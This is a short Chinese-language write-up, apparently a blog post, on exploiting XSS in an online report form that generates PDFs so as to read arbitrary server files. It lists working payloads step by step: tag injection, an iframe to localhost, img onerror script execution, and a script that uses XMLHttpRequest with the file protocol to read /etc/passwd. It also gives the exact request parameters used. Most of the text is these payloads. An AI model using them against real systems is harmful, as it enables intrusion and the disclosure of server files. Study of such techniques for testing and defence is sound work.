利用XSS漏洞读取任意文件，get新思路！

简述

    网站是一个在线填写报表功能，填写好报表之后可以生成报表的pdf文件

思路讲解

1. 发现解析xss

    首先随便输入一个payload， "><S>aaa 。发现输入的标签被解析了

2. 用iframe标签加载，但是没有内容

  使用iframe标签，但是没有内容。Id=b9bc3d&utrnumber="><iframe src="http://localhost"></iframe>&date=20

3. 确定可以解析js

d=b9bc3d&utrnumber=<img src=x οnerrοr=document.write('aaaa')>&date=20

4. 加载url地址发现file协议

Id=b9bc3d&utrnumber=<img src=x οnerrοr=document.write('aaaa'%2bwindow.location)>&date=20

5. 使用XHR(XMLHttpRequest)读取任意文件

<script>
x=new XMLHttpRequest;
x.οnlοad=function(){
document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();
</script>

Id=b9bc3d&utrnumber=<script>x=new XMLHttpRequest;x.οnlοad=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>&date=20